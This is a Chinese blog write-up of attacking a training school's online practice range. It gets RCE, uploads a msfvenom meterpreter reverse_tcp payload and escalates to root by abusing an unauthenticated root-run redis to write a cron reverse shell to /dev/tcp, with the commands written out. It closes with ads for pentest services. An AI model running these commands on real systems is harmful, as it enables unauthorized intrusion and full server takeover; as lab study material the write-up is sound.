0x00前言：

本次目標為滲透某安全培訓學校在線靶場，朋友做不出來交幫忙看下。。。
不要聽見靶場就關閉了此文，客官往下看。

0x01開端

打開此靶機各種琳瑯滿目的漏洞讓我眼花繚亂，這里我選擇一種直擊要害的漏洞作為開端，R…C…E…

人狠話不多，直接彈。

收到shell權限較吊毛…就是個www
.
發現shell沒有任何權限，無法對文件進行更改和寫入。只能對上傳目錄有寫入權限
于是find -user www。

上傳目錄通過web訪問是沒有權限訪問的，訪問uploads目錄會直接跳轉404頁面。其實上傳上PHP馬也沒什么卵用。

內核打了一圈也沒辦法提權，像我也沒得0day…哭廖。

0x02信息搜集

沒辦法不能走內核提權，就開始收集信息看看能不能進行環境變量,SUID,符號鏈接等提權。
當我執行ps -fu root 命令時.眼前一亮
root權限運行的redis臥槽有搞頭，不過不能外連。

0x003安排走起

現在需要把6379端口轉發出來，我決定用msf進行端口轉發
拿msf生成linux遠控

msfvenom-p linux/x86/meterpreter/reverse_tcp LHOST=攻擊機ip LPORT=8000 -f elf >shell.elf

但是問題又來了，目前的權限不能執行wget等遠程下載操作。。
這里我們通過上傳漏洞將elf文件上傳到服務器。


我們CD到上傳目錄準備執行遠控。


msf配置好接受會話


接下來進行端口轉發

0x04漏洞利用

nmap -A -p 6699 -script redis-info127.0.0.1 對其進行探測得知存在未授權。

./redis-cli -h 127.0.0.1 -p 6699 //鏈接redis

我不準備寫ssh的公私鑰了，直接進行彈shell。
本人親測寫ssh公私匙不穩定
我們現在VPS上使用nc監聽4445端口。

redis執行：

set xxx "\n\n*/1 * * * */bin/bash -i>&/dev/tcp/ip/44440>&1\n\n" config set dir /var/spool/cron config setdbfilename root save

成功彈回root權限的shell~

歡迎各位大佬評論交流

有技術交流或滲透測試培訓需求的朋友歡迎聯系QQ/VX-547006660，需要代碼審計、滲透測試、紅藍對抗網絡安全相關業務可以看置頂博文

2000人網絡安全交流群，歡迎大佬們來玩
群號820783253

總結

以上是生活随笔為你收集整理的linux另类提权之打靶归来(2019年老文)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。